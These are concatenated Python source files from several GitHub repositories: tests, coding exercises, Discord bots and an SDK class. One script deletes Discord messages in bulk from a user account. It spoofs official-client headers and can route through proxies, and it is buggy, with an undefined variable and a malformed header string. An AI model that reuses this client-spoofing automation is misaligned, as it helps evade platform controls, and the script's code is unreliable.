logging.info('Prediction finished')\n","repo_name":"LucaRom/deep_mh","sub_path":"inference_3enco_full_img.py","file_name":"inference_3enco_full_img.py","file_ext":"py","file_size_in_byte":19963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19950366568","text":"\"\"\"Test augmentation options object.\"\"\"\nfrom schoolnn.models import AugmentationOptions\nfrom numpy import array_equal, random\n\n\n_KEYS = [\n \"channel_shuffle\",\n \"brightness\",\n \"gaussian_noise\",\n \"dropout_boxes\",\n \"salt_and_pepper\",\n \"jpeg_artifacts\",\n \"vertical_flip\",\n \"distortion\",\n \"rotate\",\n \"scale_and_translate\",\n \"color\",\n]\n\n\ndef test_augmentation_options_from_to_dict():\n \"\"\"Create some options, dump and read them back.\"\"\"\n for disabled_option in _KEYS:\n # Activate everything but one option\n kwargs = {}\n for key in _KEYS:\n kwargs[key] = True\n kwargs[disabled_option] = False\n\n opt = AugmentationOptions(**kwargs)\n assert opt.get_augmenter() # Don't fail\n\n assert opt.to_dict() == kwargs\n assert opt.activated_count() == len(_KEYS) - 1\n\n\ndef test_augmentation_options_from_to_dict2():\n \"\"\"Create some options, dump and read them back.\"\"\"\n for enabled_option in _KEYS:\n # Activate nothing but one option\n kwargs = {}\n for key in _KEYS:\n kwargs[key] = False\n kwargs[enabled_option] = True\n\n opt = AugmentationOptions(**kwargs)\n assert opt.get_augmenter() # Don't fail\n\n assert opt.to_dict() == kwargs\n assert opt.activated_count() == 1\n\n\ndef test_augmentation_options_identity():\n \"\"\"Check if identity applies when no option is enabled.\"\"\"\n kwargs = {}\n for key in _KEYS:\n kwargs[key] = False\n\n opt = AugmentationOptions(**kwargs)\n assert opt.to_dict() == kwargs\n assert opt.activated_count() == 0\n\n random_image_array = 255 * random.rand(28, 28, 3)\n random_image_array = random_image_array.astype(\"uint8\")\n\n augmented_image = opt.get_augmenter()(image=random_image_array)\n\n assert array_equal(augmented_image, random_image_array)\n\n\ndef test_augmentation_options_augmentation():\n \"\"\"Do some augmentation.\"\"\"\n aug_options = AugmentationOptions.all_activated()\n full_augmenter = aug_options.get_augmenter()\n\n batch_size = 32\n image_side = 128\n image_batch = 255 * random.rand(batch_size, image_side, image_side, 3)\n image_batch = image_batch.astype(\"uint8\")\n\n augmented_batch = full_augmenter(images=image_batch)\n\n assert augmented_batch.shape == image_batch.shape\n assert not array_equal(image_batch, augmented_batch)\n","repo_name":"DennisNemec/school-nn","sub_path":"tests/unit/models/test_augmentation_options.py","file_name":"test_augmentation_options.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13191477857","text":"#!/usr/bin/python3\n\nimport math \ne = 50\nrntp = []\n\ndef tnp1(l):\n if l==1:\n return 1\n else:\n return tnp1(l-1) * 2 + 1\n \nrntp.append(0) \nfor i in range(1,e):\n rntp.append(rntp[i-1] * 2 +1)\n\n\ndef rtnp1(l):\n k = 0\n while True:\n if rntp[k] >= l:\n return k\n k += 1\n if k>e:\n raise Error(\"ojojoj\")\n \n\ndef process():\n [l, p , c] = [int(i) for i in input().split()]\n n = math.ceil(math.log(p/l,c))\n return rtnp1(n - 1) \n \n\n\nif __name__ == '__main__': \n for i in range(int(input())):\n print(\"Case #{0}: {1}\".format(i+1,process()))\n \n \n\n","repo_name":"elek/codejam","sub_path":"codejam/2010/10r1c/load_testing/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31353532113","text":"# PROG1 - UFCG\n# MATRICULA: 120210785 | DATA: 10/03/2022\n# ALUNO: EMANUEL VINICIUS SÁ DE LIMA E LIMA\n# PROGRAMA QUE COMPARA DUAS STRING E CONTA OS CARACTERES DIFERENTES \n\ndef compara_senhas(senha1, senha2):\n \n count = 0\n if len(senha1) <= len(senha2):\n for caracter in range(len(senha1)):\n if senha1[caracter] != senha2[caracter]:\n count += 1\n elif len(senha2) <= len(senha1):\n for caracter in range(len(senha2)):\n if senha2[caracter] != senha1[caracter]:\n count += 1\n\n\n return count\n\n\nassert compara_senhas('nome123', 'nome') == 0\nassert compara_senhas('aaa', 'bbb') == 3\nassert compara_senhas('senha', 'Senha') == 1\n\n","repo_name":"EmanuelSal/Atividades_Programacao-1","sub_path":"questões_tst/compara_senhas/compara.py","file_name":"compara.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6824221132","text":"import discord, pycurl, re, wget, certifi, html\nfrom io import BytesIO\n\nbuffer = BytesIO()\nc = pycurl.Curl()\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n await client.change_presence(activity=discord.Game(name=\"$r help\"))\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n commande = '$r '\n if message.content == \"$r help\":\n \thelping = \"Use \\\" $r \\\" followed with your search query to use RemyWiki's search engine directly on discord. \\n **Example** : $r THE SAFARI\"\n \tawait message.channel.send(helping)\n\n elif message.content.startswith(commande):\n \t#On prépare la requête curl\n \tmsg = '' + message.content\n \targument = msg.replace(commande, '').replace(\"\\\"\", \"\\'\").replace('\\'', '%27')\n \trequete = \"https://remywiki.com/api.php?action=query&list=search&srsearch=\" + argument + \"&format=json\"\n \tc.setopt(c.CAINFO, certifi.where())\n \tc.setopt(c.URL, requete)\n \tc.setopt(c.WRITEDATA, buffer)\n \tc.perform()\n \tjson = buffer.getvalue().decode('utf-8')\n \tbuffer.truncate(0)\n \t#On récupère les titres ainsi obtenus et on en garde pas plus de 9\n \ttitles = re.findall(r\"\\\"title\\\":\\\".+?\\\"\", json)\n \ttitles = [title.replace(\"\\\"\" , \"\").replace(\"title:\", \"\") for title in titles]\n \t#On affiche une erreur si le résultat ne donne aucun résultat\n \tif len(titles) == 0:\n \t\turl_afficher = \"No result found !\"\n \telse:\n \t\tminiature = \"https://remywiki.com/wiki.png\"\n\t \tlinks = re.findall(r\"\\\"pageid\\\":.+?,\", json)\n\t \tlinks = [link.replace(\"\\\"\" , \"\").replace(\"pageid:\", \"\").replace(\",\", \"\") for link in links]\n\t \tif titles[0].lower() == argument.lower() :\n\t \t\ttitre_embed = titles[0]\n\t \t\t#Si le titre d'une page correspond à notre recherche, on la joint en url directement\n\t \t\trequete = \"https://remywiki.com/?curid=\" + links[0]\n\t \t\tc.setopt(c.URL, requete)\n\t \t\tc.setopt(c.WRITEDATA, buffer)\n\t \t\tc.perform()\n\t \t\tjson = buffer.getvalue().decode('utf-8')\n\t \t\turl_afficher = requete.replace(\" \", \"%20\")\n\t \t\t#S'il y a des images sur la page, on les affichera en miniature\n\t \t\tif len(re.findall(r\"thumb tright.+?src.+?png.+?png\" ,json)) !=0:\n\t \t\t\timage = re.sub(r\"thumb tright.+?src=\", \"https://remywiki.com\" ,re.findall(r\"thumb tright.+?src.+?png.+?png\" ,json)[0]).replace(\"\\\"\", \"\")\n\t \t\telif len(re.findall(r\"thumb tright.+?src.+?jpg.+?jpg\" ,json)) !=0:\n\t \t\t\timage = re.sub(r\"thumb tright.+?src=\", \"https://remywiki.com\" ,re.findall(r\"thumb tright.+?src.+?jpg.+?jpg\" ,json)[0]).replace(\"\\\"\", \"\")\n\t \t\telse:\n\t \t\t\timage = \"https://remywiki.com/wiki.png\"\n\t \t\t#Si c'est une chanson qui a été trouvée, on prépare la prévisualisation en conséquence\n\t \t\tif len(re.findall(r\"Song Information\", json)) !=0 :\n\t \t\t\tif len(re.findall(r\"Artist:.*\", \"\", re.findall(r\"Composition\\/Arrangement:.*.+?\\.\", json)) != 0:\n\t \t\t\t\tdesc = re.sub(\"<..*?>\", \"\", re.findall(r\"<.>.+?\\.\", json)[0]).replace(\"\", \"\").replace(\"

    \", \"\")\n\t \t\t\t\tif len(desc) > 325:\n\t \t\t\t\t\tdesc = desc[0:321] + \"...\" \n\t \t\t\telse:\n\t \t\t\t\tdesc = \"\"\n\t \t\t\tdescription = \"**Name** : \" + name + \"\\n\" + \"**Birthdate** : \" + birthdate + \"\\n\" + \"**Profile** : \" + desc\n\t \t\t\t#On ajoute les informations à l'embed\n\t \t\tembed = discord.Embed(title=titre_embed, description=description.replace(\"#8594;\", \"→\"),colour=discord.Colour.blue())\n\t \t\tembed.set_image(url=image)\n\t \t\tembed.set_thumbnail(url=miniature)\n\t \t\tembed.set_author(name=artist)\n\t \t\tembed.add_field(name=\"Link\", value=\"[\" + url_afficher +\"]\" + \"(\" + url_afficher + \")\", inline=False)\n\t \t\tawait message.channel.send(embed=embed)\n\t \telse:\n\t \t\t#Si nous sommes sur la page de recherche\n\t \t\ti = 0\n\t \t\tdescription = \"\"\n\t \t\tif len(links) > 9:\n\t \t\t\tboucle = 9\n\t \t\telse:\n\t \t\t\tboucle = len(links)\n\t \t\twhile (i < boucle) :\n\t \t\t\tdescription = description + str(i+1) + \". \" + \"[\" + titles[i] +\"]\" + \"(\" + \"https://remywiki.com/?curid=\" + links[i] + \")\" + \"\\n\"\n\t \t\t\ti = i + 1;\n\t \t\tif len(links) > 9:\n\t \t\t\tdescription = description + \"...\"\n\t \t\t#Embed pour la page de recherche\n\t \t\tembed = discord.Embed(title=\"Search Results\", description=description.replace(\"→\", \"→\"),colour=discord.Colour.blue())\n\t \t\timage = \"https://remywiki.com/wiki.png\"\n\t \t\tembed.set_thumbnail(url=miniature)\n\t \t\turl_afficher = \"https://remywiki.com/index.php?search=\" + argument.replace(\" \", \"%20\")\n\t \t\tembed.add_field(name=\"Search Page\", value=\"[\" + url_afficher +\"]\" + \"(\" + url_afficher + \")\", inline=False)\n\t \t\tawait message.channel.send(embed=embed)\n\nclient.run('TOKEN')\n","repo_name":"Sakimotor/remywiki-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28461642232","text":"\nfruits=[\"Apple\",\"Banana\",\"Grapes\",\"Lemon\"]\nif(\"Lemon\" in fruits):\n print(\"Yes there is Lemon in fruits\")\n\n\n\n\n# Write a program that takes two lists of integers \n# and returns a new list that contains only the common \n# elements between the two lists.\ndef function(list1,list2):\n return list((set(list1)& set(list2)))\n\nlist1 =[30,80,90,48,67]\nlist2 =[80,71,23,43,67]\nprint(function(list1,list2))\n \n\n# Write a program that takes a list of \n# integers and returns a new list that \n# contains the cumulative sum of the original list.\ndef cumulativenum(numbers):\n answer =[]\n sum=0\n for num in numbers:\n sum+=num\n answer.append(sum)\n\n return answer\n \nnumbers =[40,90,80,60,50] \nprint(cumulativenum(numbers))\n\n# Write a program that takes two lists of integers \n# and returns a new list that contains the elements \n# from both lists in sorted order. \ndef arrangelist(listA,listB):\n both=listA+listB\n both.sort()\n\n return both\n \nlistA=[\"Ann\",\"Wakah\",\"Muyale\"] \nlistB=[\"Charles\",\"Zan\",\"Abriella\"]\nprint(arrangelist(listA,listB))\n\n# Write a Python program that squares each \n# element of a given list using list comprehension.\n# python\nnumersas =[40,57,71,89,59,70]\nmultiply= (x**2 for x in numersas)\nprint(multiply)\n\n# Write a Python program that filters out\n# all negative numbers from a given list \n# using list comprehension.\ndigits= [20,-4,78,90,-4,-78]\npositivenos=[x for x in digits if x>=0]\nprint(positivenos)\n\n# Write a Python program that concatenates two\n# lists using list comprehension .\ncompress= [80,90,50,60]\ncompress1=[30,80,60,70]\nlistcomp=[i for i in compress]+[i for i in compress1]\nprint(listcomp)\n\n\n\n\n","repo_name":"Ann-Okoyo/pip-listcomprehension","sub_path":"pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33982353440","text":"# coding=utf-8\nimport unittest\nimport time\n\nimport comall\nfrom logs.tests.members.cww_test import Login\nfrom setting.cww_test import test_el\nfrom setting.cww_test import setting\n\n\nclass OntimeTest(unittest.TestCase):\n\n # 初始化方法 打开浏览器\n def setUp(self):\n self.dr = comall.Comall(setting.driver_type) # 打开一个浏览器 setting里设置的Driver_type\n self.dr.open(setting.login_page)\n self.dr.max_window() # 浏览器最大化\n time.sleep(5)\n Login.test_login(self.dr, self) # 调用Login中的test_login\n\n def test_Otime(self):\n ww = self.dr\n ww.click(\"xpath\", test_el.XsubMenu) # 点击网站\n ww.move_to_element(\"xpath\", test_el.XsubMenu)\n time.sleep(5)\n\n ww.click(\"xpath\", test_el.Xontime) # 点击准时达\n ww.switch_to_frame(0)\n\n time.sleep(5)\n ww.click(\"xpath\", test_el.XaddDeliveryOntimeServer) # 点击新增准时达按钮\n ww.send_keys(\"xpath\", test_el.ontime_Xadd_baseinfo_name, u\"输入规则\") # 输入规则名称\n ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_subsite_select_show) # 展示生效分站\n ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_subsite_select) # 生效分站-选择\n time.sleep(2)\n ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_provide_type_show) # 展示配送方式\n ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_provide_type_select_first) # 选择第一个配送方式A\n time.sleep(2)\n ww.move_to_element(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu)\n ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu) # 配送区域选择成都\n ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu_chengducity) # 配送区域-成都-成都市\n\n ww.click(\"xpath\", test_el.ontime_Xadd_baseinfo_area_select_chengdu_chengducity_4) # 配送区域-成都-成都市-测试四\n ww.js('window.scrollTo(800,800);')\n ww.send_keys(\"xpath\", test_el.ontime_Xadd_baseinfo_availableDay, 10) # 可预约天数输入3\n ww.click(\"xpath\", test_el.ontime_Xadd_next_step_btn) # 下一步\n ww.js('window.scrollTo(0, -300)')\n ww.click(\"xpath\", test_el.ontime_Xadd_timeset_Xadd_btn) # 可预约时间段设置-新增按钮\n ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timestart_show) # 点击预约时间开始按钮\n ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timestart_select) # 点击7.31-08:00\n ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timeend_show) # 点击预约结束时间按钮\n ww.click(\"xpath\", test_el.ontime_Xadd_timeset_timeend_select) # 点击7.31-23:00\n ww.send_keys(\"xpath\", test_el.ontime_Xadd_timeset_num_input, 5) # 输入周内可预约最大值(周一至周五)5\n ww.send_keys(\"xpath\", test_el.ontime_Xadd_timeset_num_weekend_input, 15) # 输入周末可预约最大值(周六日)15\n ww.send_keys(\"xpath\", test_el.ontime_Xadd_timeset_price_input, 30) # 输入服务费 30\n ww.click(\"xpath\", test_el.ontime_Xadd_next_step1) # 点击下一步\n # 新增节假日\n # ww.switch_to_frame_out()\n # ww.js('window.scrollTo(0, -300)')\n # ww.switch_to_frame(0)\n # time.sleep(3)\n\n ww.click(\"xpath\", \"//*[@id='btn_addHoliday']\") # 新增\n time.sleep(3)\n\n # tc=ww.get_element('xpath','//*[@id=\"pnl_tabContent\"]')\n # iframe=tc.find_elements_by_tag_name('iframe')[0]\n\n # time.sleep(3)\n\n # ww.click('xpath','//*[@id=\"div_holidaystatus\"]/button[2]')\n tw=ww.get_elements('xpath','//*[@id=\"frm_holiday\"]/div[1]/div[1]')[1].click()\n\n # ww.click('xpath','//*[@id=\"frm_holiday\"]/div[1]/div[1]')\n #ww.click('xpath','/html/body/div[5]/div[3]/table/tbody/tr[2]/td[4]')\n\n # ww.click('xpath','//*[@id=\"frm_holiday\"]/div[1]/div[1]')\n # ww.click('xpath','/html/body/div[5]/div[3]/table/tbody/tr[2]/td[4]')\n\n\n\n # ww.js(\"$('#holiday_from1').attr('value','2017-08-01')\")\n # time.sleep(3)\n # ww.js(\"$('.datetimepicker').attr('style', 'display:none')\")\n # time.sleep(3)\n # ww.click(\"xpath\", \"//*[@id='holiday_end']\")\n # time.sleep(3)\n # ww.js(\"$('#holiday_end').attr('value','2017-08-02')\")\n # time.sleep(3)\n # ww.js(\"$('.datetimepicker').attr('style', 'display:none')\")\n # time.sleep(3)\n\n ww.click(\"xpath\", \"//*[@id='7b4fc7db-2066-4012-8cb4-645e58a3c6ab']\")\n\n # ww.click(\"xpath\", \"/html/body/div[6]/div[3]/table/tfoot/tr/th\")\n # ww.click(\"xpath\", \"//*[@id='div_holidaystatus']/button[1]\")\n # ww.click(\"xpath\", \"//*[@id='txt_holiday_num0']\")\n # ww.click(\"xpath\", \"//*[@id='txt_holiday_serverFee0']\")\n # ww.click(\"xpath\", \"//*[@id='2d1a0450-38f4-48b7-99d7-6c014f676e38']\")\n\n ww.click(\"xpath\", test_el.ontime_Xadd_next_step2) # 点击下一步\n ww.click(\"xpath\", test_el.ontime_Xadd_timeset_btn) # 点击新增规则\n ww.click(\"xpath\", test_el.ontime_Xadd_orderStartTime) # 点击下单开始时间\n ww.click(\"xpath\", test_el.ontime_Xadd_orderStartTime_hours) # 点击0时\n ww.click(\"xpath\", test_el.ontime_Xadd_orderStartTime_minutes) # 点击7.31-00:00\n ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime) # 点击下单截止时间\n ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime_nextday) # 点击下一天\n ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime_hours) # 点击下一天11点\n ww.click(\"xpath\", test_el.ontime_Xadd_orderEndTime_minutes) # 点击08/01-11:59\n ww.js('window.scrollTo(0,800);')\n ww.click(\"xpath\", test_el.ontime_Xadd_info_sublime) # 点击提交\n time.sleep(5)\n # 搜索验证\n ww.js('window.scrollTo(0,-1000)') # 退出+滑动\n ww.switch_to_frame_out()\n ww.js('window.scrollTo(0,-1000)')\n time.sleep(5)\n ww.switch_to_frame(0)\n ww.send_keys(\"xpath\", test_el.ontime_Xadd_search_input, u\"输入规则\") # 输入名称-输入规则\n time.sleep(5)\n ww.click(\"xpath\", test_el.ontime_Xadd_search_btn) # 点击搜索\n time.sleep(5)\n\n def tearDown(self):\n # self.dr.close()\n pass","repo_name":"huiboSong/tester","sub_path":"tests/members/cww_test/test_Ontime_03.py","file_name":"test_Ontime_03.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34875861073","text":"from ..vssubclient import VirtualServerSubclient\n\n\nclass OracleCloudVirtualServerSubclient(VirtualServerSubclient):\n \"\"\"Derived class from VirtualServerSubclient Base class.\n This represents a OracleCloud virtual server subclient,\n and can perform restore operations on only that subclient.\n\n \"\"\"\n\n def full_vm_restore_out_of_place(\n self,\n vm_to_restore=None,\n destination_client=None,\n proxy_client=None,\n new_name=None,\n host=None,\n power_on=True,\n copy_precedence=0,\n restore_option=None,\n **kwargs):\n \"\"\"Restores the FULL Virtual machine specified in the input list\n to the provided vcenter client along with the ESX and the datastores.\n If the provided client name is none then it restores the Full Virtual\n Machine to the source client and corresponding ESX and datastore.\n\n Args:\n vm_to_restore (list) -- list of all VMs to restore\n\n destination_client (str) -- name of the pseudo client where VM should be\n restored\n\n proxy_client (str) -- the proxy to be used for restore\n\n new_name (str) -- new name to be given to the restored VM\n\n host (str) -- destination host or cluster; restores to the\n source VM ESX if this value is not\n specified\n\n power_on (bool) -- power on the restored VM\n default: True\n\n copy_precedence (int) -- copy precedence to restored from\n default: 0\n\n restore_option (dict) -- dictionary with all the advanced restore\n options.\n\n **kwargs : Arbitrary keyword arguments Properties as of\n full_vm_restore_out_of_place\n eg:\n v2_details (dict) -- details for v2 subclient\n eg: check clients.vmclient.VMClient._child_job_subclient_details\n\n Returns:\n object - instance of the Job class for this restore job\n\n Raises:\n SDKException:\n if inputs are not of correct type as per definition\n\n if failed to initialize job\n\n if response is empty\n\n if response is not success\n\n \"\"\"\n if not restore_option:\n restore_option = {}\n restore_option[\"v2_details\"] = kwargs.get(\"v2_details\", None)\n\n # set attr for all the option in restore xml from user inputs\n self._set_restore_inputs(\n restore_option,\n vm_to_restore=self._set_vm_to_restore(vm_to_restore),\n power_on=power_on,\n copy_preceedence=copy_precedence,\n volume_level_restore=1,\n client_name=proxy_client,\n vcenter_client=destination_client,\n esx_host=host,\n out_place=True,\n restore_new_name=new_name\n )\n\n request_json = self._prepare_fullvm_restore_json(restore_option)\n return self._process_restore_response(request_json)\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/subclients/virtualserver/oracle_cloud.py","file_name":"oracle_cloud.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"40348147074","text":"import requests, json, time, os, threading, base64\r\n\r\nos.system(\"cls\")\r\nchannel_id = input(\"Channel id: \")\r\nTOKEN = input(\"Your discord token: \")\r\npath = './proxy.txt'\r\nif os.path.exists(path):\r\n with open(\"proxy.txt\", \"r\") as f:\r\n proxy = f.readlines()\r\n proxy = proxy[0]\r\nelse:\r\n proxyask = input(\"Do you want to use proxy? y/n: \")\r\n if proxyask.lower() == \"y\":\r\n with open(\"proxy.txt\", \"w\") as f:\r\n f.write(\"user:pass@ip:port\")\r\n f.close()\r\n os.system(\"cls\")\r\n print(\"\\nProcess closed. Add your proxy to `proxy.txt` and start again.\")\r\n time.sleep(3)\r\n exit()\r\n else:\r\n os.system(\"cls\")\r\n print(\"\\nProcess using local ip...\")\r\n proxy = None\r\n\r\nprint(\"\\nYour discord token wont be saved/used anywhere else. Its only for the request to find your account.\")\r\nprint(\"\\nStarting...\")\r\ntime.sleep(3)\r\n\r\n\r\nxsuper = \"eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwMS4yNDAuOTUgKEludGVybmV0KS5TY3JpcHQvMTAuMDsgV2Ugbm8t) {x-super}\"\r\n\r\nheaders = {\r\n \"Authorization\": TOKEN,\r\n \"Connection\": \"keep-alive\",\r\n \"Content-Length\": \"0\",\r\n \"Host\": \"discord.com\",\r\n \"Origin\": \"https://discord.com\",\r\n \"Referer\": \"https://discord.com/channels/@me\",\r\n \"sec-ch-ua\": '\"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"',\r\n \"sec-ch-ua-mobile\": \"?0\",\r\n \"sec-ch-ua-platform\": \"Windows\",\r\n \"Sec-Fetch-Dest\": \"empty\",\r\n \"Sec-Fetch-Mode\": \"cors\",\r\n \"Sec-Fetch-Site\": \"same-origin\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\r\n \"X-Debug-Options\": \"bugReporterEnabled\",\r\n \"X-Discord-Locale\": \"en-US\",\r\n \"X-Discord-Timezone\": \"Asia/Colombo\",\r\n \"X-Super-Properties\": xsuper\r\n}\r\n\r\ndef get_messages(channel_id, your_user_id, proxy):\r\n \r\n message_ids = []\r\n before_message_id = None\r\n\r\n for _ in range(10):\r\n try:\r\n params = {\r\n \"limit\": 100,\r\n \"before\": before_message_id\r\n }\r\n if proxy == None:\r\n t = requests.get(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages\", headers=headers, params=params)\r\n else:\r\n proxylist = {\r\n \"http://\":proxy,\r\n \"https://\":proxy\r\n }\r\n t = requests.get(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages\", headers=headers, params=params, proxies=proxylist)\r\n\r\n if t.status_code == 200:\r\n messages = t.json()\r\n\r\n if not messages:\r\n break\r\n\r\n for message in messages:\r\n if message[\"author\"][\"id\"] == your_user_id:\r\n message_ids.append(message[\"id\"])\r\n print(f\"Grabbed message: {message['id']}\")\r\n\r\n before_message_id = messages[-1][\"id\"]\r\n else:\r\n print(f\"Failed to retrieve messages. Status code: {t.status_code}\")\r\n break\r\n except Exception as e:\r\n print(f\"Error: {str(e)}\")\r\n\r\n return message_ids\r\n\r\n\r\ndef delete(message_id, channel_id, proxy=None):\r\n global rate_limit_reset\r\n\r\n if proxy is None:\r\n t = requests.delete(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}\", headers=headers)\r\n else:\r\n proxylist = {\r\n \"http\": proxy,\r\n \"https\": proxy\r\n }\r\n t = requests.delete(url=f\"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}\", headers=headers, proxies=proxylist)\r\n\r\n if t.status_code == 204:\r\n print(f\"Deleted Message: {message_id}\")\r\n elif t.status_code == 429:\r\n retry_after = int(t.headers.get('Retry-After', 0))\r\n print(f\"!RETRY! RATE LIMIT!! Waiting {retry_after} seconds\")\r\n time.sleep(retry_after)\r\n delete(message_id, channel_id, proxy)\r\n elif t.status_code == 403:\r\n print(\"Cannot delete system message.\")\r\n else:\r\n print(f\"Error: {t.status_code}\")\r\n print(t.text)\r\n\r\nyour_user_id = int(base64.b64decode(token.split(\".\")[0]))\r\nmessage_ids = get_messages(channel_id, your_user_id, proxy)\r\nprint(\"\\nGrabbed all messages...\")\r\ntime.sleep(3)\r\nthreadarray = []\r\nfor message_id in message_ids:\r\n time.sleep(0.3)\r\n thread = threading.Thread(target=delete, args=(message_id, channel_id, proxy,), daemon=False)\r\n thread.start()\r\n threadarray.append(thread)\r\n\r\nfor thread in threadarray:\r\n thread.join()\r\n \r\n\r\nprint(\"Done. :)\")\r\n","repo_name":"MAROKYlmfao/Discord-Message-Deleter","sub_path":"delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22005107017","text":"def multiply(input_list):\n result = 1\n for element in input_list:\n result *= element\n return result\n\n\ndef better_multiply(*multicands):\n result = 1\n for element in multicands:\n result *= element\n return result\n\n\ndef display(**kwargs):\n for key , value in zip(kwargs.keys() , kwargs.values()):\n print(key , value)\n\n\ndef arg_convention(required_input , optional_input = 5 , *args , **kwargs):\n print(required_input , optional_input , args , kwargs)\n return 3\n\n\nmy_list = [1 , 2 , 3 , 4 , 5]\nprint(len(my_list))\nprint(display(x = \"test\", y = \"ing \", z = \"kwargs\"))\nprint(multiply([6 , 9]))\nprint(better_multiply(9 , 6))\n","repo_name":"Ion-The-Prize/2022-Math-IA","sub_path":"Algebra Tinkering.py","file_name":"Algebra Tinkering.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16137132772","text":"import math\r\nimport random\r\n\r\ndef randomCalc(ops, digit):#This function creates the random question that is asked, it's two inputs define the level it needs\r\n num1 = random.randint(0,math.pow(10,digit))\r\n num2 = random.randint(0,math.pow(10,digit))\r\n op = random.choice(ops)\r\n answer = eval(str(num1) + op + str(num2))\r\n print('What is {} {} {}?\\n'.format(num1, op, num2))\r\n return answer\r\n\r\ndef GameStart():\r\n totaloperations = ['+','-','*','/','%']\r\n print (\"Welcome to the random math question game!\\n\\n\\n\")\r\n Total_Errors = 0\r\n for level in range(5):#Iterate through each level\r\n stars_that_level = 0#Amount of values they solved correctly\r\n print (\"Level %d:\\nPossible length of Numbers:%d\\nPossible number of Operators:%d\"%((level+1),max(1,(level+1)/2),(level+1)))\r\n for question in range(5):#Iterate through each question\r\n correctvalue = randomCalc(totaloperations[:level+1],max(1,(level+1)/2))\r\n WrongInput = True\r\n while WrongInput:#Repeat until we get suitable input\r\n\r\n #Print out the correct amount of stars that round\r\n allstars =''\r\n for numofstars in range(stars_that_level):\r\n allstars+='*'\r\n if allstars != '':\r\n print (allstars)\r\n\r\n attemptedvalue = input(\">>>\")\r\n for i in attemptedvalue:\r\n if ((i != '0' and i != '1' and i != '2' and i != '3' and i != '4' and i != '5' and i != '6' and i != '7' and i != '8' and i != '9' and i!='-')):#BONUS: Check if the value is correct or not\r\n WrongInput = True\r\n print (\"ERROR! Un-acceptable entry detected, try again please!\\n\")\r\n break\r\n else:\r\n WrongInput = False\r\n\r\n if (int(attemptedvalue)==correctvalue):#First convert the value into an integer, and check if the answer is correct\r\n stars_that_level+=1\r\n print (\"Correct! You gain an additional star! You now have %d out of five stars!\"%(stars_that_level))\r\n else:\r\n Total_Errors += 1#Add onto the total errors\r\n print (\"Wrong! You do not gain any stars for that question!\\nYou name have %d out of five stars!\"%(stars_that_level))\r\n if (stars_that_level>=3):#Checks if there are enough stars\r\n print (\"You have enough stars this level, time to move on!\")\r\n else:\r\n print (\"You do not have enough stars to move on to the next level, this as far as you go!\")\r\n return\r\n print (\"Amazing! You beat the game! You answered a total of %d answers wrong this attempt\"%(Total_Errors))\r\n\r\nGameStart()","repo_name":"oktaydoganyildiz/Math-Game","sub_path":"Math Game.py","file_name":"Math Game.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4783207672","text":"#! /Users/nsanthony/miniconda3/bin/python\nimport rooms.room_class as rc\nfrom people.people_directory import person_template\n\nblank = rc.room()\nblank.name = 'blank room'\nblank.descript = 'This is a blank room'\nblank.size = 'You cant see the edge'\nblank.occupied = 0\nblank.people = person_template\nblank.coord = 